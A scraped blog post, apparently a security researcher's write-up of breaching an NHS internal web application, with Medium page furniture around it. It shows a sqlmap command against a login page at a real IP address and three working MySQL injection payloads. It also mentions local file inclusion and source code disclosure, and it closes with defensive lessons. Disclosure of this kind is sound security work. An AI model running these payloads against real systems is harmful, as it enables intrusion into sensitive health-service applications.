Hacking the NHS for Fun and No Profit

Still not sorry for the shitty stock art.
$ python sqlmap.py -u 'https://194.176.105.219/login.php' --random-agent --data='username=test&password=test&btnLogin=Login' --batch --dbs
POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 454 HTTP(s) requests:
---
Parameter: username (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: username=test' RLIKE (SELECT (CASE WHEN (3915=3915) THEN 0x74657374 ELSE 0x28 END))-- MgVq&password=test&btnLogin=Login
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: username=test' AND (SELECT 5095 FROM(SELECT COUNT(*),CONCAT(0x716b707171,(SELECT (ELT(5095=5095,1))),0x716b7a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ppwP&password=test&btnLogin=Login
Type: AND/OR time-based blind
Title: MySQL <= 5.0.11 OR time-based blind (heavy query)
Payload: username=test' OR 4720=BENCHMARK(5000000,MD5(0x6d7a554b))-- GVLM&password=test&btnLogin=Login
---
It’s pronounced jif.
The “home” page displayed after logging in.
It’s still pronounced jif.

Local file inclusion in the log viewer

Source code disclosure

  • You don’t need NSA exploits to breach sensitive systems. A chain is only as strong as its weakest link.
  • Know your assets, and know them well. If you’re not in control, who is?
  • Don’t allow your internal applications to face the Internet, even if they require authentication.

--

--

--

https://twitter.com/NathOnSecurity

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

The California Information Practices Act (IPA)

CZ reports that Binance recovered $5.8 million from the Axie Intelity Hackers.

How To Set a Strong Password in Office 365

The Generation of Random Numbers Is Too Important to Be Left to Chance

The Generation of Random Numbers Is Too Important to Be Left to Chance

Merlinlab Yield Aggregator Security Apparatus, One that enthuses Investors

IPL https://t.co/NV0kgm9mfm https://t.co/DvssOadhPi

The Expectation of Digital Privacy from a Legal Lens

Start Bluestacks For Windows 8

Download bluestacks for pc free windows 8

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Nathan

Nathan

https://twitter.com/NathOnSecurity

More from Medium

Runner Up at BPJS Kesehatan Security Hackathon

Hunting non-ASCII printable JSON keys

It’s a process problem

The infosec/cybersec industry sucks